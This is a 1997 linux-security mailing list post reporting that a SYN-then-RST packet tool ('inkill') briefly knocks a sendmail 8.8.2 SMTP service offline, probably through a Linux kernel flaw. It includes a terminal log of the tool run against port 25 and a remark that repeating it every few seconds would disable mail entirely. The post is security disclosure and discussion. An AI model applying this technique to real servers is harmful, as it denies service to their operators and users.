[1406] in linux-security and linux-alert archive
[linux-security] problems in kernel?
daemon@ATHENA.MIT.EDU (Vadim Kolontsov)
Tue Jan 28 12:05:15 1997
Date: Tue, 28 Jan 1997 15:25:54 +0300 (MSK)
From: Vadim Kolontsov <vadim@tversu.ac.ru>
To: linux-security@redhat.com
In-Reply-To: <199701271010.NAA09867@shade.msu.ru>
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com
Hello,
it seems that you can kill not only inetd by sending SYN, RST (see
previous discussion). See this log.. pay your attention to time marks
(ip addresses changed)
-------------------------- cut here ----------------------------
11:37:48> telnet somewhere.in.the.world 25
Trying 1.2.3.4...
Connected to somewhere.in.the.world.
Escape character is '^]'.
^]
telnet> quit
Connection closed.
11:37:48> /home/vadim/C/inkill -p 25 somewhere.in.the.world 25
Source host: 10.11.12.13
Destination host: 1.2.3.4
Destination port: 25
Sending SYN packet... Done
Sending RST packet... Done
11:37:48> telnet somewhere.in.the.world 25
Trying 1.2.3.4...
telnet: Unable to connect to remote host: Connection refused
11:37:49> telnet somewhere.in.the.world 25
Trying 1.2.3.4...
telnet: Unable to connect to remote host: Connection refused
11:37:49> telnet somewhere.in.the.world 25
Trying 1.2.3.4...
Connected to somewhere.in.the.world.
Escape character is '^]'.
^]
telnet> quit
Connection closed.
------------------------------------------------------------------------
Interesting behavior, isn't it? Sendmail's version was 8.8.2. If
attacker will sent SYN and RST packets every 3 seconds, he can completely
disable SMTP...
So it seems that problem not only in inetd or sendmail, but in kernel
too, because the same version of sendmail works fine under FreeBSD. I have
no Linux at this time, so I can't research the problem by myself.
Any ideas?
Best regards, Vadim.
--------------------------------------------------------------------------
Vadim Kolontsov SysAdm/Programmer
Tver Regional Center of New Information Technologies Networks Lab